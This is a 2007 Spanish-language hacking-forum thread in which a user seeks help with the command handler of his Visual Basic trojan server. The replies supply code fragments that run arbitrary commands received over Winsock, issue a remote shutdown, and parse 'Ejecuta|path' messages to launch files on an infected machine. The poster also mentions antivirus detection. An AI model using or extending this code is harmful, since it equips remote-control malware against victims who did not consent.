elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Duda a la hora de crear un troyano
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Duda a la hora de crear un troyano  (Leído 1,974 veces)
Xerok1!

Desconectado Desconectado

Mensajes: 228



Ver Perfil
Duda a la hora de crear un troyano
« en: 29 Mayo 2007, 19:00 pm »

bueno,mi duda es la siguiente::

yo,tengo el codigo de mi troyano hecho,el unico problema esq en el data arrival del server,para ejecutar kualkier archivo,tengo q colocar un "Else"(para q si los dats no son los definids anteriormente ejecute los nuevos datos...),bueno,pues esto obviamente funciona correctamente,el problema,esq yo quiero tambien q el server muestre un msgbox con los dats q lleguen,pero sin ejecutar a la vez estos...os pongo un ejemplo de lo k ocurre(no es mi troyano,es un ejemplo simple para q se entienda...):::


Código:
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
Winsock1.GetData datos
If datos = "apagar" Then
Shell "shutdown -s -t 00", vbHide
Else 'aki esta mi problema,q si los datos no son "apagar",ejecuta,hace un msgbox....
Shell datos, vbMaximizedFocus ' esto ejecuta los datos...pero y si yo quiero tener las 2 funciones(q ejecute y q cree un msgbox???)
End If
End Sub

el code esta perfecto,pero si yo quiero tener en el "else" dos funciones(ejecutar y enviar un msgbox)puedo??
esq lo q me sucede esq primero envia un msgbox con los datos,y despues ejecuta mi programa...

siento si esta un poco lioso pero esq es dificil de explicar.. :-\ :-\

pd:yo solucione este problema creando dos winsock,y q en el data arrival de uno ejecutara y en el otro creara un msgbox,pero es demasiado xapucero y da problemas cn los antivirus etc(por q si el infectado permite una conexion bieeen!! pero no creo q sea tan estupido de permitir varias conexiones del mismo programa en distintos puertos...)

un saludo y gracias de antemano  ;) ;)


En línea

[Firma]Esperando haber si acaba el concurso de firmas y la pongo[/Firma]
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: Duda a la hora de crear un troyano
« Respuesta #1 en: 29 Mayo 2007, 20:45 pm »

Hola, no es necesario todo eso. Veras, la tecnica mas empleada en estos casos es usar un caracter para hacer un split, me explico:

Tu por ejemplo desde el cliente envias esto al server:
Código:
ws.sendata "Ejecuta|C:\exec.bat"

Y en la llegada del server partes esos datos por el "|" con un split:
Código:
Winsock1.GetData datos
Partes = split(datps, "|")

Asi en Partes(0) te kedaria "Ejecuta", q seria la cadena q tendrias q comparar:
Código:
select case Partes(0)
case "Ejecuta"
'Aki lo q kieras hacer, en este caso seria algo asi
Shell parte(1)

Ya que en parte(1) estaria guardada la ruta, es decir C:\exec.bat.

Asi puedes hacer cualkier opcion ;)
1S4ludo


En línea

Xerok1!

Desconectado Desconectado

Mensajes: 228



Ver Perfil
Re: Duda a la hora de crear un troyano
« Respuesta #2 en: 29 Mayo 2007, 20:56 pm »

Gracias EON!!!,esa tecnica intente usarla poniendo q desde el cliente enviara en un textbox "c:\" + text1.text, y q desde el cliente una vez leyera "c:\" + datos lo interpretara,el problema esq eso me funcionaba pero me avisaba un msgbox de todas formas cn los dats jejeje..
muxas gracias ;) ;)

saludos!
En línea

[Firma]Esperando haber si acaba el concurso de firmas y la pongo[/Firma]
vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: Duda a la hora de crear un troyano
« Respuesta #3 en: 30 Mayo 2007, 02:41 am »

Citar
el problema esq eso me funcionaba pero me avisaba un msgbox de todas formas cn los dats jejeje..

no entiendo q problema tienes ahora... q no te hace el msgbox?? es sencillo mira...

Código:
select case Partes(0)
case "Ejecuta"
'Aki lo q kieras hacer, en este caso seria algo asi
Shell parte(1)
msgbox parte(1)

y si lo quieres hacer como estaba tu codigo.. despues del else pones todas las cosas q quieras q haga... no importa cuantas sean ni los renglones q ocupen


creo q esas eran tus dudas XD

si no avisame y veo si te puedo ayudar ;)
En línea

Xerok1!

Desconectado Desconectado

Mensajes: 228



Ver Perfil
Re: Duda a la hora de crear un troyano
« Respuesta #4 en: 30 Mayo 2007, 15:15 pm »

si,justo eso era mi duda..gracias!,esq no se me ocurria de ninguna forma :-\ jejeje

un saludo ;) ;)
En línea

[Firma]Esperando haber si acaba el concurso de firmas y la pongo[/Firma]
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
JSP-tengo un fallo a la hora de crear el textfield
Desarrollo Web
juni85 0 2,476 Último mensaje 5 Junio 2011, 21:15 pm
por juni85
(solucionado)Duda con hora de ejecucion
Programación Visual Basic
Trane! 4 2,068 Último mensaje 16 Julio 2011, 22:38 pm
por Trane!
Problema a la hora de crear procedure de insercion de datos en oracle
Bases de Datos
guass19 2 3,610 Último mensaje 20 Junio 2012, 09:04 am
por guass19
Duda a la hora de estudiar desarrollo Web
Desarrollo Web
moskita789 8 3,012 Último mensaje 20 Diciembre 2012, 03:29 am
por moskita789
Duda a la hora de hacer una restricción
Bases de Datos
Magnumrace 4 4,096 Último mensaje 12 Junio 2021, 14:36 pm
por Magnumrace
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines